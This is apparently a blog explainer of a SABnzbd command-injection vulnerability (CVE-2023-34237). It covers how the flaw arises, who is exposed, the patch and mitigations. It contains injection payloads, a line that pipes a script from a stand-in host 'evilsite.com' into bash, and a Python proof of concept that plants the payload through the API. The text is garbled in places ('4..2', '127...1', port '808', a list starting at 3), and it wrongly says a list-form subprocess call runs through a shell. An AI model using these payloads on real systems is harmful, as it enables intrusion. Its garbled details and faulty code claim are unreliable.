CVE-2023-34237 - Remote Code Execution in SABnzbd via Notification Script Parameters

SABnzbd is a popular open source tool for automated downloading from Usenet. As convenient as it is, it recently made news because of a serious security problem: CVE-2023-34237. This vulnerability could let an attacker execute code remotely—basically, getting control of your SABnzbd server if certain conditions are met. In this article, we’ll break down what the issue is, how it works, and how you can protect yourself.

What Is CVE-2023-34237?

In short, CVE-2023-34237 is a design flaw in SABnzbd’s Notification Script feature. This feature is supposed to let you run custom scripts on different events (like when a download finishes). However, due to how SABnzbd passes parameters to these scripts, an attacker with access to SABnzbd’s web interface can manipulate the Parameters field and make the program execute arbitrary commands—basically, run whatever code they want with the same permissions as the SABnzbd process.

TL;DR:  
If someone can access your SABnzbd web interface and you haven’t set a username and password, they might be able to run commands on your machine.

How Does the Vulnerability Work?

When you add a new Notification Script in SABnzbd's settings, you can specify custom parameters. The code passed these parameters to the script in a way that didn’t sanitize or securely handle user input (think: shell command injection). A clever attacker can inject special characters or commands that break out from the intended parameter and execute arbitrary code.

Example Exploit

Let’s say your script is called notify.sh, and you set an argument in SABnzbd’s interface like this:

some_param; rm -rf /tmp/testdir

If the backend just stuffs your input into a shell command like

subprocess.call(['/path/to/notify.sh', user_param])

and does not sanitize user_param, your injected ; rm -rf /tmp/testdir will get executed by the shell, deleting the /tmp/testdir directory.

Here’s how an unsafe call might look in Python (for illustration)

import subprocess

# BAD: Don't do this
user_input = "PWNED; touch /tmp/pwned"
subprocess.call(f"./myscript.sh {user_input}", shell=True)

If SABnzbd’s process is running as a privileged user, the attacker could essentially take control of your system.

Who Is at Risk?

- Default Installations: By default, SABnzbd only listens on localhost (your own computer), and the web interface doesn’t require a password.
- Risky Setups: If you changed the settings to allow access beyond localhost (for example, exposing it on your home network or even directly on the internet) without setting a username/password, you’re a sitting duck for this exploit.

How Can It Be Exploited Remotely?

If you exposed SABnzbd to any untrusted network (home WiFi, shared network, the whole internet) and didn't set a login password, then anyone who can reach the web interface can run code as your SABnzbd user.

Attacker accesses the web interface—no password needed (common on many misconfigured setups).

3. Attacker goes to Notifications scripts, adds a custom parameter like ; curl http://evilsite.com/malware.sh | bash.

Proof of Concept (PoC)

Warning: This code is for educational use only.

If you have SABnzbd accessible at http://target-ip:808, and there's no authentication

import requests

url = "http://target-ip:808/sabnzbd/api"
payload = "; touch /tmp/pwned"  # Will create a file called /tmp/pwned

params = {
    "mode": "set_config",
    "name": "script_param",
    "value": payload,
    "apikey": "SOME_API_KEY_OR_BLANK_IF_NONE"
}
requests.get(url, params=params)

Trigger the script notification as normal—the malicious code runs!

The SABnzbd team was quick to respond. They patched the flaw in

- Commit e3a722
- Commit 422b4f

This fix is included in release 4..2.

What did they do?  
They properly sanitized and validated input parameters before passing them to the executed script, removing the possibility for injection.

Set a strong username and password for the web interface. (Under Settings > General > Security)

- Do NOT expose SABnzbd to the internet or any untrusted networks. Restrict to localhost (127...1).

Official References

- GitHub Security Advisory
- Issue Tracker
- Release Notes (4..2)
- NVD Listing

Final Thoughts

CVE-2023-34237 is a reminder that even popular, trusted open source tools can have dangerous flaws—especially when running user-provided scripts. Always keep your software up-to-date, protect your web tools with passwords, and never expose applications like SABnzbd directly to the internet.

Timeline

Published on: 06/07/2023 20:15:00 UTC
Last modified on: 06/22/2023 00:05:00 UTC